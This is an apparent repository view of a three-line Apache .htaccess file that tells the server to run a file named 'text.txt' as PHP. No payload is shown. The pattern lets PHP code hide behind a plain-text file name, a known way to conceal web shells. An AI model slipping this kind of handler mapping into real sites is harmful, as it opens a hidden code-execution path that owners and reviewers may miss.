Website/.htaccess

3 lines
66 B
ApacheConf
Raw Normal View History

<Files "text.txt">
SetHandler application/x-httpd-php
</Files>